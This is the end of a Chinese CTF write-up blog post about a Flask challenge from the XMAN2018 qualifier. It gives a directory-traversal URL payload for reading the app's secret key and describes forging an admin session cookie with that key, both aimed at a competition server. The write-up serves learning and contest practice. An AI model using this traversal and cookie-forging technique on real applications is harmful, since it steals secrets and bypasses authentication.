<p>他这里没对传入的参数进行过滤, 所以导致了可以目录穿越. 直接访问<code>/assert/..%2f..%2f.secret_key</code>就可以获取到 key<br>构造<code>payload</code>下载<code>key</code>文件</p>
<pre><code>http://202.112.51.184:13080/asserts/..%2f..%2f.secret_key</code></pre>
<p>然后本地搭建环境, 把登陆部分的<code>session[&#39;admin&#39;]=False</code>改成    <code>True</code>; 然后抓登陆后的包, 把 cookie 复制过去题目就能看到 flag 了.</p>
<h3 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h3><p>这个题没做出来，对flask的理解很很差，准备写一个flask，然后把一些常见的flask漏洞做个总结。</p>
<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><p><a target="_blank" rel="noopener" href="http://flag0.com/2018/08/12/xman2018%E4%B8%AA%E4%BA%BA%E6%8E%92%E4%BD%8D%E8%B5%9BWeb-MISCWriteup/#0x04-SSHOP">Misc的题目可以参考这位大佬的</a></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:v0wldl@163.com">V0WKeep3r</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://v0w.top/2018/08/11/XMAN2018排位赛wp/">http://v0w.top/2018/08/11/XMAN2018排位赛wp/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://v0w.top">V0W's Blog</a>！</span></div></div><div class="post-meta__tag-list"></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/AlipayQR.png"><div class="post-qr-code__desc">支付宝打赏</div></div><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/wechatQR.png"><div class="post-qr-code__desc">微信打赏</div></div></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2018/08/12/nc%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4&amp;%E5%8F%8D%E5%BC%B9shell/"><i class="fa fa-chevron-left">  </i><span>Linux nc命令与反弹shell</span></a></div><div class="next-post pull-right"><a href="/2018/08/05/sqli-lab%E9%80%9A%E5%85%B3%E7%AC%94%E8%AE%B0Lesson1-10/"><span>sqli-lab通关笔记Less1-10</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = 'false' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'xuqLRcah5FaInOgKRdj9JB3V-gzGzoHsz',
  appKey:'8vMPXnFoh7Fih1g29jw4JNxl',
  placeholder:'师傅可以留下你的评论和邮箱，V0W能够通过邮件get并回复哦～',
  avatar:'retro',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(/img/index.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2021 By V0WKeep3r</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>